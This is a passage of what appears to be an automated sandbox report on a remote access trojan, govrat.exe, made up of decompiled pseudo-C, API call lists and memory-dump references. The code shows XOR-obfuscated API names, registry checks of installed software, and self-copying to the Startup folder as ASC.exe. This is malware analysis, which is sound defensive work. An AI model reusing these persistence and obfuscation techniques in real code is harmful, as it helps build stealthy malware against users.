    					 *(__ebp - 0x82) = __ax;
    					__eax = 0x65;
    					 *(__ebp - 0x80) = __ax;
    					__eax = 0;
    					 *(__ebp - 0x7e) = __ax;
    					__eax = __ebp - 0x98;
    					__eax = RegQueryValueExW( *(__ebp - 0x10), __ebp - 0x98, __ebx, __ebx, __ebx, __ebx); // executed
    					if(__eax != 0) {
    						__eax = 0x53;
    						 *(__ebp - 0xd8) = __ax;
    						__eax = 0x79;
    						 *(__ebp - 0xd6) = __ax;
    						__eax = 0x73;
    						 *(__ebp - 0xd4) = __ax;
    						__eax = 0x74;
    						 *(__ebp - 0xd2) = __ax;
    						__eax = 0x65;
    						 *(__ebp - 0xd0) = __ax;
    						__eax = 0x6d;
    						 *(__ebp - 0xce) = __ax;
    						__eax = 0x43;
    						 *(__ebp - 0xcc) = __ax;
    						__eax = 0x6f;
    						 *(__ebp - 0xca) = __ax;
    						__eax = 0x6d;
    						 *(__ebp - 0xc8) = __ax;
    						__eax = 0x70;
    						 *(__ebp - 0xc6) = __ax;
    						__eax = 0x6f;
    						 *(__ebp - 0xc4) = __ax;
    						__eax = 0x6e;
    						 *(__ebp - 0xc2) = __ax;
    						__eax = 0x65;
    						 *(__ebp - 0xc0) = __ax;
    						__eax = 0x6e;
    						 *(__ebp - 0xbe) = __ax;
    						__eax = 0x74;
    						 *(__ebp - 0xbc) = __ax;
    						__eax = 0;
    						 *(__ebp - 0xba) = __ax;
    						__ebp - 0xc = __ebp - 0x148;
    						__eax = __ebp - 0xd8;
    						 *(__ebp - 0xc) = 4;
    						__eax = RegQueryValueExW( *(__ebp - 0x10), __ebp - 0xd8, __ebx, __ebx, __ebp - 0x148, __ebp - 0xc); // executed
    						if(__eax != 0 ||  *(__ebp - 0x148) != 1) {
    							__eax = 0x44;
    							 *(__ebp - 0x7c) = __ax;
    							__eax = 0x69;
    							 *(__ebp - 0x7a) = __ax;
    							__eax = 0x73;
    							 *(__ebp - 0x78) = __ax;
    							__eax = 0x70;
    							 *(__ebp - 0x76) = __ax;
    							__eax = 0x6c;
    							 *(__ebp - 0x74) = __ax;
    							__eax = 0x61;
    							 *(__ebp - 0x72) = __ax;
    							__eax = 0x79;
    							 *(__ebp - 0x70) = __ax;
    							__eax = 0x4e;
    							 *(__ebp - 0x6e) = __ax;
    							__eax = 0x61;
    							 *(__ebp - 0x6c) = __ax;
    							__eax = 0x6d;
    							 *(__ebp - 0x6a) = __ax;
    							__eax = 0x65;
    							 *(__ebp - 0x68) = __ax;
    							__eax = 0;
    							 *(__ebp - 0x66) = __ax;
    							__ebp - 0xc = __ebp - 0x24c;
    							__eax = __ebp - 0x7c;
    							 *(__ebp - 0xc) = __edi;
    							__eax = RegQueryValueExW( *(__ebp - 0x10), __ebp - 0x7c, __ebx, __ebx, __ebp - 0x24c, __ebp - 0xc); // executed
    							if(__eax == 0) {
    								__ebp - 0x24c = __ebp - 0x44c;
    								__eax = L00951667(__ebp - 0x44c, __edi, __ebp - 0x24c, 0xffffffff);
    								__eax = 0x44;
    								 *(__ebp - 0xb8) = __ax;
    								__eax = 0x69;
    								 *(__ebp - 0xb6) = __ax;
    								__eax = 0x73;
    								 *(__ebp - 0xb4) = __ax;
    								__eax = 0x70;
    								 *(__ebp - 0xb2) = __ax;
    								__eax = 0x6c;
    								 *(__ebp - 0xb0) = __ax;
    								__eax = 0x61;
    								 *(__ebp - 0xae) = __ax;
    								__eax = 0x79;
    								 *(__ebp - 0xac) = __ax;
    								__eax = 0x56;
    								 *(__ebp - 0xaa) = __ax;
    								__eax = 0x65;
    								 *(__ebp - 0xa8) = __ax;
    								__eax = 0x72;
    								 *(__ebp - 0xa6) = __ax;
    								__eax = 0x73;
    								 *(__ebp - 0xa4) = __ax;
    								__eax = 0x69;
    								 *(__ebp - 0xa2) = __ax;
    								__eax = 0x6f;
    								 *(__ebp - 0xa0) = __ax;
    								__eax = 0x6e;
    								 *(__ebp - 0x9e) = __ax;
    								__eax = 0;
    								 *(__ebp - 0x9c) = __ax;
    								__ebp - 0xc = __ebp - 0x24c;
    								__eax = __ebp - 0xb8;
    								 *(__ebp - 0xc) = __edi;
    								__eax = RegQueryValueExW( *(__ebp - 0x10), __ebp - 0xb8, __ebx, __ebx, __ebp - 0x24c, __ebp - 0xc); // executed
    								if(__eax == 0) {
    									__ebp - 0x44c = L00951F39(__ebp - 0x44c, __edi, L"   (", 0xffffffff);
    									__ebp - 0x24c = __ebp - 0x44c;
    									L00951F39(__ebp - 0x44c, __edi, __ebp - 0x24c, 0xffffffff) = __ebp - 0x44c;
    									__eax = L00951F39(__ebp - 0x44c, __edi, 0x9706d4, 0xffffffff);
    								}
    								__ebp - 0x44c = L00951F39(__ebp - 0x44c, __edi, "\n", 0xffffffff);
    								__eax =  *(__ebp - 8);
    								if(__eax != __ebx) {
    									__edx = __eax + 2;
    									do {
    										__cx =  *__eax;
    										__eax = __eax + 2;
    									} while (__cx != __bx);
    									__eax = __eax - __edx;
    									__ecx = __eax;
    									__eax = __ebp - 0x44c;
    									__edx = __eax + 2;
    									 *(__ebp + 8) = __eax + 2;
    									do {
    										__dx =  *__eax;
    										__eax = __eax + 2;
    									} while (__dx != __bx);
    									__eax = __eax -  *(__ebp + 8);
    									__eax = __eax >> 1;
    									__eax = __eax + __ecx;
    									 *(__ebp + 8) = __eax;
    									__eax = L00951D71(__edi, __esi,  *(__ebp - 8), __eax); // executed
    									_pop(__ecx);
    									_pop(__ecx);
    									 *(__ebp - 8) = __eax;
    								} else {
    									__eax = __ebp - 0x44c;
    									__edx = __eax + 2;
    									do {
    										__cx =  *__eax;
    										__eax = __eax + 2;
    									} while (__cx != __bx);
    									__eax = __eax - __edx;
    									__eax = __eax >> 1;
    									 *(__ebp + 8) = __eax;
    									 *(__ebp - 8) = __eax;
    									__eax = L00958BA0(__eax, __ebx,  *(__ebp + 8));
    								}
    								__eax = __ebp - 0x44c;
    								__edx = __eax + 2;
    								do {
    									__cx =  *__eax;
    									__eax = __eax + 2;
    								} while (__cx != __bx);
    								__ebp - 0x44c =  *(__ebp + 8);
    								__eax =  *(__ebp + 8) >> 1;
    								__eax = L00951F39( *(__ebp - 8),  *(__ebp + 8) >> 1, __ebp - 0x44c,  *(__ebp + 8) >> 1);
    							}
    						}
    					}
    				}
    				if( *((intOrPtr*)(_t121 - 0x10)) != _t118) {
    					_push( *((intOrPtr*)(_t121 - 0x10)));
    					return L0099F7C9(_t113);
    				}
    				_push(_t118);
    				_push(_t118);
    				_push(_t118);
    				_push(_t118);
    				_push(_t121 - 0xc);
    				_push(_t121 - 0x24c);
    				_push( *((intOrPtr*)(_t121 - 0x24)));
    				 *((intOrPtr*)(_t121 - 0xc)) = 0x80;
    				_push( *((intOrPtr*)(_t121 - 0x2c)));
    				return L0099BA8E(_t121 - 0x24c, _t119);
    				goto L23;
    			}







    APIs
    • RegQueryValueExW.KERNEL32(?,?), ref: 0095D80C
    • RegQueryValueExW.KERNEL32(?,?,?,?,?,?), ref: 0095D8D3
    • RegQueryValueExW.KERNEL32(?,?,?,?,?,00000004,?,?,?,?), ref: 0095D950
    • RegQueryValueExW.KERNEL32(?,?,?,?,?,00000004), ref: 0095DA22
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd

    Control-flow Graph

    C-Code - Quality: 46%
    			E00953626(void* __ebx, void* __edx, intOrPtr* __edi, intOrPtr* __esi) {
    				intOrPtr _t3;
    				intOrPtr _t4;
    				intOrPtr _t5;
    				intOrPtr _t6;
    				void* _t7;
    				void* _t9;
    				intOrPtr* _t11;
    				intOrPtr _t12;
    				intOrPtr* _t14;
    				void* _t15;
    				void* _t16;
    				intOrPtr _t17;
    				intOrPtr* _t25;
    				intOrPtr* _t29;
    
    				_t25 = __edi;
    				_t19 = __ebx;
    				_t3 =  *__esi(); // executed
    				_push( *0x9738d8);
    				 *0x9738d4 = _t3; // executed
    				_t4 =  *__esi(); // executed
    				_push( *0x9738dc);
    				 *0x9738d8 = _t4; // executed
    				_t5 =  *__esi(); // executed
    				_push( *0x9738e0);
    				 *0x9738dc = _t5; // executed
    				_t6 =  *__esi(); // executed
    				 *0x9738e0 = _t6;
    				_t7 = L009582EA();
    				if(_t7 == 0) {
    					L5:
    					L0095329C(_t19);
    					_t9 = 0;
    					__eflags = 0;
    				} else {
    					L00A0FDFC(__ebx, __edi);
    					_t11 =  *_t25( *0x9738d4, E00953420, _t7); // executed
    					_t12 =  *_t11();
    					 *0x972904 = _t12;
    					if(_t12 == 0xffffffff) {
    						goto L5;
    					} else {
    						_t29 = E00958FD6(1, 0x214);
    						if(_t29 == 0) {
    							goto L5;
    						} else {
    							_t14 =  *_t25( *0x9738dc,  *0x972904, _t29); // executed
    							_t15 =  *_t14();
    							_t33 = _t15;
    							if(_t15 == 0) {
    								goto L5;
    							} else {
    								_push(0);
    								_push(_t29);
    								_t16 = L009532D9(__ebx, __edx, _t25, _t29, _t33);
    								_push(__edx);
    								_t17 = L00981263(_t16, _t29);
    								 *(_t29 + 4) =  *(_t29 + 4) | 0xffffffff;
    								 *_t29 = _t17;
    								_t9 = 1;
    							}
    						}
    					}
    				}
    				return _t9;
    			}


















    APIs
    • RtlEncodePointer.NTDLL ref: 00953626
    • RtlEncodePointer.NTDLL ref: 00953633
    • RtlEncodePointer.NTDLL ref: 00953640
    • RtlEncodePointer.NTDLL ref: 0095364D
    • RtlDecodePointer.NTDLL(Function_00003420,00000000), ref: 0095366E
      • Part of subcall function 00958FD6: Sleep.KERNEL32(00000000), ref: 00958FFE
    • RtlDecodePointer.NTDLL(00000000), ref: 0095369D
      • Part of subcall function 0095329C: TlsFree.KERNEL32(00000016), ref: 009532C7
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd

    Control-flow Graph

    C-Code - Quality: 97%
    			E009658AB() {
    				struct HINSTANCE__* _v8;
    				char _v11;
    				intOrPtr _v15;
    				intOrPtr _v19;
    				char _v20;
    				char _v23;
    				intOrPtr _v27;
    				intOrPtr _v31;
    				char _v32;
    				char _v35;
    				intOrPtr _v39;
    				intOrPtr _v43;
    				char _v44;
    				char _v48;
    				intOrPtr _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				char _v64;
    				char _v68;
    				short _v70;
    				short _v72;
    				short _v74;
    				short _v76;
    				short _v78;
    				short _v80;
    				short _v82;
    				char _v84;
    				char _v86;
    				intOrPtr _v90;
    				intOrPtr _v94;
    				intOrPtr _v98;
    				intOrPtr _v102;
    				char _v104;
    				void* __ebx;
    				void* __ebp;
    				struct HINSTANCE__* _t89;
    				void* _t91;
    				_Unknown_base(*)()* _t93;
    				void* _t94;
    				_Unknown_base(*)()* _t96;
    				void* _t97;
    				_Unknown_base(*)()* _t99;
    				void* _t100;
    				_Unknown_base(*)()* _t102;
    				void* _t103;
    				_Unknown_base(*)()* _t105;
    				signed int _t117;
    				_Unknown_base(*)()** _t119;
    				void* _t123;
    
    				_v70 = 0xa4;
    				_v72 = 0xed;
    				_v74 = 0xf4;
    				_v76 = 0xe5;
    				_v78 = 0xf3;
    				_v80 = 0xe8;
    				_v82 = 0xec;
    				_t119 =  *0x975974; // 0x1b2d78
    				_v84 = 0xf7;
    				_v68 = 0;
    				_t117 = 0;
    				do {
    					 *(_t123 + _t117 * 2 - 0x50) =  *(_t123 + _t117 * 2 - 0x50) ^ 0x000000a4;
    					_t117 = _t117 + 1;
    					_t125 = _t117 - 8;
    				} while (_t117 < 8);
    				_push( &_v84);
    				_v68 = 1;
    				_push(0);
    				_t89 = L009D2753( &_v84, 0, _t125);
    				_v8 = _t89;
    				if(_t89 == 0) {
    					L19:
    					__eflags = 0;
    					return 0;
    				}
    				_v52 = 0xaafdd9de;
    				_v56 = 0xd9c3d2ef;
    				_v60 = 0xcfc6c3ec;
    				_v64 = 0xc2decbfa;
    				_v48 = 0;
    				_t91 = 0;
    				do {
    					 *(_t123 + _t91 - 0x3c) =  *(_t123 + _t91 - 0x3c) ^ 0x000000aa;
    					_t91 = _t91 + 1;
    				} while (_t91 < 0x10);
    				_v48 = 1;
    				_t93 = GetProcAddress(_v8,  &_v64); // executed
    				 *_t119 = _t93;
    				_v90 = 0xaef9cbc3;
    				_v94 = 0xcfe0cbc2;
    				_v98 = 0xc7e8cac0;
    				_v102 = 0xc7e8c6da;
    				_v104 = 0xcffe;
    				_v86 = 0;
    				_t94 = 0;
    				do {
    					 *(_t123 + _t94 - 0x64) =  *(_t123 + _t94 - 0x64) ^ 0x000000ae;
    					_t94 = _t94 + 1;
    				} while (_t94 < 0x12);
    				_v86 = 1;
    				_t96 = GetProcAddress(_v8,  &_v104); // executed
    				 *(_t119 + 4) = _t96;
    				_v15 = 0xb1e6f8c1;
    				_v19 = 0xdcf2c3c5;
    				_v20 = 0xe2;
    				_v11 = 0;
    				_t97 = 0;
    				do {
    					 *(_t123 + _t97 - 0x10) =  *(_t123 + _t97 - 0x10) ^ 0x000000b1;
    					_t97 = _t97 + 1;
    				} while (_t97 < 9);
    				_v11 = 1;
    				_t99 = GetProcAddress(_v8,  &_v20); // executed
    				 *(_t119 + 8) = _t99;
    				_v27 = 0xb4e3c6dc;
    				_v31 = 0xf7e6c6c0;
    				_v32 = 0xe7;
    				_v23 = 0;
    				_t100 = 0;
    				do {
    					 *(_t123 + _t100 - 0x1c) =  *(_t123 + _t100 - 0x1c) ^ 0x000000b4;
    					_t100 = _t100 + 1;
    				} while (_t100 < 9);
    				_v23 = 1;
    				_t102 = GetProcAddress(_v8,  &_v32); // executed
    				 *(_t119 + 0xc) = _t102;
    				_v39 = 0xb7e0fec5;
    				_v43 = 0xc3e4c5c3;
    				_v44 = 0xe4;
    				_v35 = 0;
    				_t103 = 0;
    				do {
    					 *(_t123 + _t103 - 0x28) =  *(_t123 + _t103 - 0x28) ^ 0x000000b7;
    					_t103 = _t103 + 1;
    				} while (_t103 < 9);
    				_v35 = 1;
    				_t105 = GetProcAddress(_v8,  &_v44); // executed
    				 *(_t119 + 0x10) = _t105;
    				if( *_t119 == 0 ||  *(_t119 + 4) == 0 ||  *(_t119 + 8) == 0 ||  *(_t119 + 0xc) == 0 || _t105 == 0) {
    					goto L19;
    				} else {
    					return 1;
    				}
    			}





















































    APIs
    • GetProcAddress.KERNEL32(00960300,000000AA,00000014,00000000,?,00000000,00974D08), ref: 00965960
    • GetProcAddress.KERNEL32(00960300,000000AE), ref: 009659A1
    • GetProcAddress.KERNEL32(00960300,000000B1), ref: 009659D3
    • GetProcAddress.KERNEL32(00960300,000000B4), ref: 00965A05
    • GetProcAddress.KERNEL32(00960300,000000B7), ref: 00965A37
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd

    Control-flow Graph

    C-Code - Quality: 59%
    			E009520FF(void* __ebx, void* __edx, void* __edi) {
    				void* _t18;
    				intOrPtr _t20;
    				void* _t24;
    				intOrPtr _t25;
    				void* _t27;
    				void* _t28;
    				void* _t29;
    				void* _t30;
    				intOrPtr _t31;
    				void* _t44;
    				signed int _t45;
    				void* _t48;
    				void* _t51;
    				intOrPtr _t52;
    				void* _t53;
    
    				_t49 = __edi;
    				_t48 = __edx;
    				_t42 = __ebx;
    				_t52 =  *0x976b38; // 0x0
    				if(_t52 == 0) {
    					_push(0);
    					_push(0);
    					_push(1);
    					_push(0);
    					_push(__ebx);
    					L00A03E20(_t18, __ebx, __edi, 0);
    				}
    				_t53 =  *0x950000 - 0x5a4d; // 0x5a4d
    				if(_t53 == 0) {
    					_t20 =  *0x95003c; // 0xf0
    					__eflags =  *((intOrPtr*)(_t20 + 0x950000)) - 0x4550;
    					if( *((intOrPtr*)(_t20 + 0x950000)) != 0x4550) {
    						goto L3;
    					} else {
    						_t43 = 0x10b;
    						__eflags =  *((intOrPtr*)(_t20 + 0x950018)) - 0x10b;
    						if( *((intOrPtr*)(_t20 + 0x950018)) != 0x10b) {
    							goto L3;
    						} else {
    							__eflags =  *((intOrPtr*)(_t20 + 0x950074)) - 0xe;
    							if( *((intOrPtr*)(_t20 + 0x950074)) <= 0xe) {
    								goto L3;
    							} else {
    								__eflags =  *(_t20 + 0x9500e8);
    								_t7 =  *(_t20 + 0x9500e8) != 0;
    								__eflags = _t7;
    								_t43 = 0 | _t7;
    								 *(_t51 - 0x1c) = _t7;
    							}
    						}
    					}
    				} else {
    					L3:
    					 *(_t51 - 0x1c) = 0;
    				}
    				if(L009522EB() == 0) {
    					L009520C0(_t48, 0x1c);
    					_pop(_t43);
    				}
    				if(L0095354F(_t49) == 0) {
    					L009520C0(_t48, 0x10);
    					_pop(_t43);
    				}
    				L00958007();
    				 *((intOrPtr*)(_t51 - 4)) = 0;
    				_t24 = E00957DC2(_t42, _t49); // executed
    				_t56 = _t24;
    				if(_t24 < 0) {
    					_t24 = L009525D6(_t48, _t56);
    					_t43 = 0x1b;
    				}
    				_push(_t51); // executed
    				_t25 = L00A00B3A(_t24, _t49); // executed
    				 *0x976b34 = _t25;
    				 *0x973240 = L00957D2B(_t42, 0);
    				_t27 = L00957C70(_t43);
    				_t57 = _t27;
    				if(_t27 < 0) {
    					L009525D6(_t48, _t57);
    					_t43 = 8;
    				}
    				_t28 = E009579FA(_t43, _t48, _t49);
    				_t58 = _t28;
    				if(_t28 < 0) {
    					_push(9);
    					L009525D6(_t48, _t58);
    				}
    				_t29 = E009523B5(_t49, 0, 1); // executed
    				_pop(_t44);
    				_t59 = _t29;
    				if(_t29 != 0) {
    					L009525D6(_t48, _t59);
    					_t44 = _t29;
    				}
    				_t30 = L0095799B(_t44);
    				if(( *(_t51 - 0x3c) & 0x00000001) == 0) {
    					_t45 = 0xa;
    				} else {
    					_t45 =  *(_t51 - 0x38) & 0x0000ffff;
    				}
    				_push(_t45);
    				_push(_t30);
    				_t31 = E00961829(0x950000, 0); // executed
    				 *((intOrPtr*)(_t51 - 0x20)) = _t31;
    				if( *(_t51 - 0x1c) == 0) {
    					L0095258C(_t31);
    				}
    				L009525B8();
    				 *((intOrPtr*)(_t51 - 4)) = 0xfffffffe;
    				return E009580A5( *((intOrPtr*)(_t51 - 0x20)));
    			}



















    APIs
    • __RTC_Initialize.LIBCMT ref: 0095217F
    • __amsg_exit.LIBCMT ref: 00952192
      • Part of subcall function 00957C70: _parse_cmdline.LIBCMT ref: 00957CC7
      • Part of subcall function 00957C70: _parse_cmdline.LIBCMT ref: 00957D08
    • __amsg_exit.LIBCMT ref: 009521B8
      • Part of subcall function 009579FA: _strlen.LIBCMT ref: 00957A24
      • Part of subcall function 009579FA: _strlen.LIBCMT ref: 00957A55
    • __amsg_exit.LIBCMT ref: 009521C9
      • Part of subcall function 009523B5: __initterm_e.LIBCMT ref: 009523EB
    • __amsg_exit.LIBCMT ref: 009521DC
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd

    Control-flow Graph

    C-Code - Quality: 77%
    			E009613C5(void* __ecx, void* __edx, void* __eflags) {
    				void* __ebx;
    				void* _t4;
    				void* _t5;
    				intOrPtr _t13;
    				intOrPtr _t14;
    				intOrPtr* _t16;
    				intOrPtr _t19;
    				intOrPtr _t21;
    				intOrPtr _t30;
    				void* _t34;
    				void* _t37;
    				signed int _t38;
    				void* _t42;
    				void* _t44;
    				void* _t51;
    				void* _t69;
    				char** _t72;
    
    				_t51 = __edx;
    				_t37 = __ecx;
    				_t4 = E00960693(); // executed
    				if(_t4 != 0) {
    					_push(_t34);
    					_push(_t34);
    					_push(_t34);
    					_push(0x95f8f4);
    					_push(_t34);
    					_push(_t34);
    					return L0097BAA1(_t4, _t34, _t37);
    				}
    				_push(_t4);
    				_t5 = L00A090ED(_t34);
    				__eflags = _t5 - 4;
    				if(_t5 != 4) {
    					_t38 = 8;
    					memcpy(0x975914, 0x97079c, _t38 << 2);
    					memcpy(0x975934, 0x9707c0, 0 << 2);
    					_t42 = 8;
    					_t65 = 0x9707e4;
    					memcpy(0x9758f4, 0x9707e4, 0 << 2);
    					_t72 = _t69 + 0x24;
    					E0095DDE1(0x974f18, 0x974f1c); // executed
    					 *_t72 = L"C:\\Users\\angela\\AppData\\Roaming\\MICROS~1\\Windows\\STARTM~1\\Programs\\Startup";
    					E0095FAC9(0, _t51, __eflags);
    					 *_t72 = L"C:\\Users\\angela\\AppData\\Roaming\\MICROS~1\\Windows\\STARTM~1\\Programs\\Startup\\ASC.exe"; // executed
    					L009601FD(__eflags); // executed
    					 *_t72 = L"C:\\Users\\angela\\Desktop\\govrat.exe";
    					E0095FB12(0x974f18, _t51, 0x9707e4 + _t42 + _t42, 0x9707e4, __eflags);
    					_t44 = 8; // executed
    					_t13 = L0095F5AF(0x974f18, 0x9707e4 + _t42 + _t42, 0x9707e4); // executed
    					__eflags = _t13;
    					if(__eflags == 0) {
    						L10:
    						_t14 = L00960340(_t65, __eflags);
    						__eflags = _t14;
    						if(_t14 != 0) {
    							goto L8;
    						} else {
    							_t65 = 0x1388;
    							_push(0x1388);
    							E0095D184();
    							_t19 = L00960383(0x1388, __eflags);
    							__eflags = _t19;
    							if(_t19 == 0) {
    								goto L8;
    							} else {
    								_push(0x1388);
    								E0095D184();
    								_t21 = E0096524E(0x974f18); // executed
    								__eflags = _t21;
    								if(_t21 != 0) {
    									__eflags =  *0x9759a4; // 0x0
    									if(__eflags == 0) {
    										L0096106C(_t51, __eflags, 0x974f18); // executed
    										 *_t72 = 0x7d0;
    										E0095D184();
    										E00960BBC(0x974f18); // executed
    									}
    									_push(L0095F5EF(0x974f18, 0, _t65));
    									L009A7EBD(_t65);
    									PostMessageW( *0x9759b0, 0x400, 0, 0); // executed
    									PostMessageW( *0x9759b0, 0x405, 0, 0); // executed
    								}
    							}
    						}
    					} else {
    						_t30 = E009602B6(0x974f18, __eflags);
    						__eflags = _t30;
    						if(_t30 != 0) {
    							_push(0);
    							E009603C5(0x974f18, _t44, _t51, 0, 0x9707e4);
    						}
    						L8:
    						__eflags =  *0x9759a4; // 0x0
    						if(__eflags != 0) {
    							_t16 =  *0x974f14; // 0x0
    							_push(0);
    							 *_t16 = 1;
    							RtlExitUserThread();
    							goto L10;
    						}
    					}
    					__eflags = 0;
    					return 0;
    				} else {
    					_push(_t34);
    					return L00A0270E(_t5, _t37);
    				}
    				goto L17;
    			}





















    APIs
    • PostMessageW.USER32(00000405,00000000,00000000), ref: 00961513
      • Part of subcall function 009603C5: CloseHandle.KERNEL32(?), ref: 00960452
      • Part of subcall function 00960340: CloseHandle.KERNEL32(00000000), ref: 00960377
    • RtlExitUserThread.NTDLL(00000000,00000000), ref: 00961494
      • Part of subcall function 0095D184: CloseHandle.KERNEL32(00000000), ref: 0095D1A0
    • PostMessageW.USER32(00000400,00000000,00000000,00000000), ref: 00961504
    Strings
    • C:\Users\user\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\ASC.exe, xrefs: 00961446
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
    C-Code - Quality: 57%
    			E00961520(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, intOrPtr _a12, signed int _a16) {
    				long _v12;
    				char _v14;
    				short _v16;
    				short _v18;
    				short _v20;
    				short _v22;
    				short _v24;
    				short _v26;
    				char _v28;
    				signed int _t48;
    				signed int _t56;
    				void* _t58;
    				void* _t60;
    				int _t62;
    				void* _t63;
    				intOrPtr _t66;
    				void* _t67;
    				intOrPtr _t69;
    				signed int _t81;
    				signed int _t90;
    				void* _t96;
    				void* _t97;
    
    				_t91 = __esi;
    				_t84 = __edx;
    				_t71 = __ebx;
    				_t96 = _t97;
    				_t41 = _a8;
    				_push(__ebx);
    				_push(__esi);
    				_push(__edi);
    				if(_t41 != 1) {
    					__eflags = _t41 - 0xf;
    					if(_t41 == 0xf) {
    						L39:
    						_push(_a16);
    						_push(_a12);
    						_push(_a8);
    						_push(_a4);
    						return L00986584(_t41);
    					} else {
    						__eflags = _t41 - 5;
    						if(_t41 == 5) {
    							goto L39;
    						} else {
    							__eflags = _t41 - 2;
    							if(_t41 == 2) {
    								goto L39;
    							} else {
    								__eflags = _t41 - 0x10;
    								if(_t41 != 0x10) {
    									__eflags = _t41 - 0x12;
    									if(_t41 != 0x12) {
    										__eflags = _t41 - 0x16;
    										if(__eflags != 0) {
    											__eflags = _t41 - 0x400;
    											if(_t41 != 0x400) {
    												__eflags = _t41 - 0x463;
    												if(_t41 != 0x463) {
    													__eflags = _t41 - 0x401;
    													if(_t41 != 0x401) {
    														__eflags = _t41 - 0x402;
    														if(__eflags != 0) {
    															__eflags = _t41 - 0x403;
    															if(_t41 != 0x403) {
    																__eflags = _t41 - 0x404;
    																if(_t41 == 0x404) {
    																	goto L39;
    																} else {
    																	__eflags = _t41 - 0x464;
    																	if(_t41 != 0x464) {
    																		__eflags = _t41 - 0x405;
    																		if(_t41 != 0x405) {
    																			__eflags = _t41 - 0x4a;
    																			if(_t41 == 0x4a) {
    																				__eflags =  *_a16 - 1;
    																				if( *_a16 == 1) {
    																					_push( &_v28);
    																					return L009771C0( &_v28, __edx, 1);
    																				}
    																			}
    																			goto L39;
    																		} else {
    																			_push( &_v12);
    																			__eflags = 0;
    																			_push(0);
    																			_push(0);
    																			_push(L0096089D);
    																			_push(0);
    																			_push(0);
    																			return L009D99C7( &_v12);
    																		}
    																	} else {
    																		_push( &_v12);
    																		_push(0);
    																		_push(0);
    																		_push(0x960baf);
    																		_push(0);
    																		_push(0);
    																		_push(_t96);
    																		_t41 = L0099E834( &_v12, 0, __ecx);
    																		goto L39;
    																	}
    																}
    															} else {
    																_t48 = _a16;
    																asm("cdq");
    																_t81 = 0x32;
    																_t41 = _t48 / _t81;
    																_v12 = _t48 % _t81;
    																_t90 = _t48 / _t81;
    																while(1) {
    																	__eflags = _t90;
    																	if(_t90 == 0) {
    																		break;
    																	}
    																	_t90 = _t90 - 1;
    																	__eflags = _t90;
    																	Sleep(0x32);
    																}
    																Sleep(_v12);
    																goto L39;
    															}
    														} else {
    															_push(__edx);
    															_t41 = L009C22C5(_t41, __edx, 1, __eflags);
    															__eflags = _t41 - 4;
    															if(_t41 == 4) {
    																_v16 = 0x16a;
    																_v18 = 0x14b;
    																_v20 = 0x11e;
    																_v22 = 0x118;
    																_v24 = 0x10f;
    																_v26 = 0x106;
    																_v28 = 0x12b;
    																_v14 = 0;
    																_t56 = 0;
    																__eflags = 0;
    																do {
    																	 *(_t96 + _t56 * 2 - 0x18) =  *(_t96 + _t56 * 2 - 0x18) ^ 0x0000016a;
    																	_t56 = _t56 + 1;
    																	__eflags = _t56 - 7;
    																} while (_t56 < 7);
    																_push(0);
    																_push( &_v28);
    																_push(0x9706d0);
    																_push(0);
    																_v14 = 1;
    																_push(0);
    																_t41 = L00998713( &_v28, 0);
    															}
    															goto L39;
    														}
    													} else {
    														_push(0x10);
    														__eflags = 0;
    														_push(0);
    														_push(__ecx);
    														_t58 = L0099D45A(_t41);
    														_push(0x9759b4);
    														_push(0);
    														_push(_t58);
    														_push(E0096125F);
    														_push(0);
    														_push(0);
    														return L0099A17E(_t58);
    													}
    												} else {
    													_t60 =  *0x972f0c; // 0xb8
    													_v12 = 0;
    													__eflags = _t60 - 0xffffffff;
    													if(__eflags == 0) {
    														CloseHandle( *0x972f0c);
